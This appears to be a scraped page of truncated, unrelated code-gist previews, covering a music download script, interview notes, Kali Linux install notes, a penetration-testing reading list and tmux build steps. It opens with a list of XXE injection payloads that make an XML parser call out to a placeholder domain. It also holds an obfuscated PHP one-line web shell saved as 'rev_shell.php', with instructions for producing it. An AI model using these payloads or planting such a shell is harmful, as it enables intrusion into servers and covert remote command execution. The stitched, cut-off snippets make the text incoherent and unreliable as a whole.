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You've got two main options:
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x /> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x /> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y |
<?=`{${~"\xa0\xb8\xba\xab"}["\xa0"]}`; | |
/* | |
* In terminal: | |
* $ echo -ne '<?=`{${~\xa0\xb8\xba\xab}[\xa0]}`;' > rev_shell.php | |
* This is how the code will be produced, \xa0\xb8\xba\xab will be | |
* treated as constant therefore no " needed. It is also not copyable | |
* string because of non-ascii characters | |
* | |
* Explanation: |
#!/usr/bin/python | |
# -*- coding: utf-8 -*- | |
''' | |
This is a little script to download every song from every playlist | |
if your Google Play Music account. Songs are organized as follows: | |
<playlist>/<artist>/<album>/<song>.mp3 | |
I Highly recomend putting this file in your %USER%\Music folder | |
before running. |
I bundled these up into groups and wrote some thoughts about why I ask them!
If these helped you, I'd love to hear about it!! I'm on twitter @vcarl_ or send me an email carl.vitullo@gmail.com
https://blog.vcarl.com/interview-questions-onboarding-workplace/
Download the appropriate Kali Linux .iso
I used a 64 bit .iso
image, downloaded via HTTP. I downloaded the amd64 weekly version, as the pool
linux headers (needed below for installation of wireless drivers) were ahead of the stable release kernel.
Download the SHA256SUMS
and SHA256SUMS.gpg
files from the same location.
Docker provides download links in release note. They promised that
(we) will also include download links in release notes for future releases.
Note:
From: http://redteams.net/bookshelf/ | |
Techie | |
Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp. | |
Social Engineering: The Art of Human Hacking by Christopher Hadnagy | |
Practical Lock Picking: A Physical Penetration Tester's Training Guide by Deviant Ollam | |
The Art of Deception: Controlling the Human Element of Security by Kevin Mitnick | |
Hacking: The Art of Exploitation by Jon Erickson and Hacking Exposed by Stuart McClure and others. | |
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning by Fyodor | |
The Shellcoder's Handbook: Discovering and Exploiting Security Holes by several authors |
This is a guide for aligning images.
See the full Advanced Markdown doc for more tips and tricks
# Install tmux on Centos release 6.5 | |
# install deps | |
yum install gcc kernel-devel make ncurses-devel | |
# DOWNLOAD SOURCES FOR LIBEVENT AND MAKE AND INSTALL | |
curl -OL https://github.com/libevent/libevent/releases/download/release-2.0.22-stable/libevent-2.0.22-stable.tar.gz | |
tar -xf libevent-2.0.22-stable.tar.gz | |
cd libevent-2.0.22-stable | |
./configure --prefix=/usr/local |